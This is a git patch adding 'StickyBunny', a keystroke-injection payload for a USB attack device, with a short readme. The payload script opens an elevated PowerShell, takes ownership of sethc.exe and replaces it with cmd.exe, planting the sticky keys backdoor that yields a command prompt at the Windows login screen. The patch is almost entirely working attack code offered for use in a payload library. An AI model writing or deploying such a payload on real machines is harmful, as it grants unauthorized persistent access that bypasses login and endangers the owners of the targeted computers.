From 3c2dd4ac1e07cf6e759a77abdd46b17809a0cb83 Mon Sep 17 00:00:00 2001
From: InvaderSquibs <zachary.t.walton@gmail.com>
Date: Mon, 24 Jul 2017 15:00:33 -0600
Subject: [PATCH] Added stickyBunny payload (#232)

---
 .../library/execution/StickyBunny/payload.txt | 64 +++++++++++++++++++
 .../library/execution/StickyBunny/readme.md   | 21 ++++++
 2 files changed, 85 insertions(+)
 create mode 100644 payloads/library/execution/StickyBunny/payload.txt
 create mode 100644 payloads/library/execution/StickyBunny/readme.md

diff --git a/payloads/library/execution/StickyBunny/payload.txt b/payloads/library/execution/StickyBunny/payload.txt
new file mode 100644
index 00000000..8ea53f50
--- /dev/null
+++ b/payloads/library/execution/StickyBunny/payload.txt
@@ -0,0 +1,64 @@
+#!/bin/bash
+#
+# Title:         StickyBunny
+# Author:        Squibs
+# Version:       0.3
+# Plug2Pwn:		 18s
+#
+# Creates the sticky keys back door on a windows machine
+#
+# Blue...............Preparing Attack
+# Yellow.............Attacking
+# Green..............GTFO
+
+#Open Admin Powershell 
+ATTACKMODE HID
+LED B 200
+Q GUI
+Q DELAY 500
+Q STRING POWERSHELL
+Q DELAY 1000
+Q CTRL-SHIFT ENTER
+Q DELAY 2000
+Q LEFTARROW
+Q DELAY 100
+Q ENTER
+Q DELAY 1200
+
+#Give Permissions for sethc.exe to current user
+LED Y 500 
+Q STRING "\$Acl = Get-Acl sethc.exe"
+Q ENTER
+Q DELAY 100
+Q STRING "\$Ar = New-Object  system.security.accesscontrol.filesystemaccessrule(\$env:UserName,\"FullControl\",\"Allow\")"
+Q ENTER
+Q DELAY 100
+Q STRING "\$Acl.SetAccessRule(\$Ar)"
+Q ENTER
+Q DELAY 100
+Q STRING "Set-Acl sethc.exe \$Acl"
+Q ENTER
+Q DELAY 100
+
+#Copy over CMD to SETHC.EXE (Save sethc.exe as sethc.exe.bak if you want to be nice)
+Q STRING "xcopy sethc.exe sethc.exe.bak"
+Q ENTER 
+Q DELAY 1200
+Q STRING "F"
+Q DELAY 100
+Q STRING "xcopy cmd.exe sethc.exe"
+Q ENTER
+Q DELAY 200
+Q STRING "Y"
+Q ENTER
+Q DELAY 200
+
+# GTFO
+Q STRING EXIT
+Q ENTER
+
+#Sync Drive
+sync
+
+#Trap is clean!
+LED G
diff --git a/payloads/library/execution/StickyBunny/readme.md b/payloads/library/execution/StickyBunny/readme.md
new file mode 100644
index 00000000..ed532966
--- /dev/null
+++ b/payloads/library/execution/StickyBunny/readme.md
@@ -0,0 +1,21 @@
+# StickyBunny
+* Author:	Squibs
+* Version:	0.1
+* Target:	Windows
+* Time:		19s
+
+## Description
+
+Changes the sticky keys executeable to a CMD executatble allowing CMD to be opened at login page.
+
+## Configuration
+
+None.
+
+## STATUS
+
+| LED                | Status                                       |
+| ------------------ | -------------------------------------------- |
+| Blue (blinking)    | Setting up                                   |
+| Purple (blinking)  | Running Attack		                        |
+| Green  (solid)     | Complete							            |